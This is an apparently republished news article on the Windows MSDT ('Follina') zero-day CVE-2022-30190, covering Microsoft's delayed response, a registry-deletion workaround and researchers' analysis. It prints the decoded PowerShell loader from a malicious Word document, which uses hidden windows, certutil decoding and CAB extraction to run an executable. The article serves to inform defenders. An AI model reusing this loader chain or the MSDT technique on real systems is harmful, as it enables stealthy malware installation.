Categories: Technology

Code execution 0-day in Windows has been under active exploit for 7 weeks

[ad_1]

A critical code execution zero-day in all supported versions of Windows has been under active exploit for seven weeks, giving attackers a reliable means for installing malware without triggering Windows Defender and a roster of other endpoint protection products.

The Microsoft Support Diagnostic Tool vulnerability was reported to Microsoft on April 12 as a zero-day that was already being exploited in the wild, researchers from Shadow Chaser Group said on Twitter. A response dated April 21, however, informed the researchers that the Microsoft Security Response Center team didn’t consider the reported behavior a security vulnerability because, supposedly, the MSDT diagnostic tool required a password before it would execute payloads.

Uh, nevermind

On Monday, Microsoft reversed course, identifying the behavior with the vulnerability tracker CVE-2022-30190 and warning for the first time that the reported behavior constituted a critical vulnerability after all.

“A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,” the advisory stated. “An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.”

At the time of this story’s publication, Microsoft had yet to issue a patch. Instead, it was advising customers to disable the MSDT URL Protocol by:

  1. Run Command Prompt as Administrator.
  2. To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename
  3. Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”

Although initially missed by Microsoft, the vulnerability was again spotted when a researcher identified a Word document uploaded to VirusTotal on Friday that exploited the previously unknown attack vector.

According to analysis by researcher Kevin Beaumont, the document uses Word to retrieve an HTML file from a remote web server. The document then uses the MSProtocol URI scheme to load and execute PowerShell commands.

“That should not be possible,” Beaumont wrote.

Unfortunately, it is possible.

When the commands in the document are decoded, they translate to:

$cmd = "c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r
%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

According to researcher John Hammond of security firm Huntress, the script:

  • Starts hidden windows to:
    • Kill msdt.exe if it is running
    • Loop through files inside a RAR file, looking for a Base64 string for an encoded CAB file
      • Store this Base64 encoded CAB file as 1.t
      • Decode the Base64 encoded CAB file to be saved as 1.c
      • Expand the 1.c CAB file into the current directory, and finally:
      • Execute rgb.exe (presumably compressed inside the 1.c CAB file)

Beaumont also called attention to this academic paper, which in August 2020 showed how to use MSDT to execute code. That suggests that there was at least one other time the company’s security team failed to grasp the potential for this behavior to be maliciously exploited.

No, Protected View won’t save you

Normally, Word is set up to load content downloaded from the Internet in what’s known as protected view, a mode that disables macros and other potentially harmful functions. For reasons that aren’t clear, Beaumont said, if the document is loaded as a Rich Text Format file, it “runs without even opening the document (via the preview tab in Explorer) let alone Protected View.

In other words, Huntress researchers wrote, the RTF file can “trigger the invocation of this exploit with just the Preview Pane within Windows Explorer.” In so doing, “this extends the severity of this threat by not just ‘single-click’ to exploit, but potentially with a ‘zero-click’ trigger.”

Besides the document uploaded to VirusTotal on Friday, researchers uncovered a separate Word file uploaded on April 12 that exploits the same zero-day.

Given the severity of this unpatched vulnerability, organizations that rely on Microsoft Office should thoroughly investigate how it affects their networks. Disabling the MSDT URL Protocol isn’t likely to create major disruptions in the short run and possibly in the long run. While investigating—at least until Microsoft releases more details and guidance—Office users should turn the protocol off entirely and give any documents downloaded over the Internet additional scrutiny.

[ad_2]
Source link
Admin

Recent Posts

Kijangwin is the latest online video gaming provider

Kijangwin is your brand-new go-to destination for all things internet gaming. Whether you're an informal…

2 days ago

How to Style Trendy Clothes Effortlessly

Hey there, fashion enthusiasts! Are you ready to dive into the world of trendy clothes…

3 days ago

How to effectively recover your frozen/stolen funds from fraudulent platforms

Hey there! If you're reading this, there's a good chance you've found yourself in the…

3 days ago

Important things about Core 2 . 0 regarding Hemp Users

Hey there, hemp enthusiasts! If you've been on the hunt for the next big thing…

5 days ago

Exploring the Features and Benefits of Strio

Hey there! Have you ever found yourself tangled up in the world of communication and…

1 week ago

The Importance of Pre-Sale Pest Control: Ensuring a Smooth Home Transaction

Are you worried that hidden critters might derail your home sale? Selling a house can…

1 week ago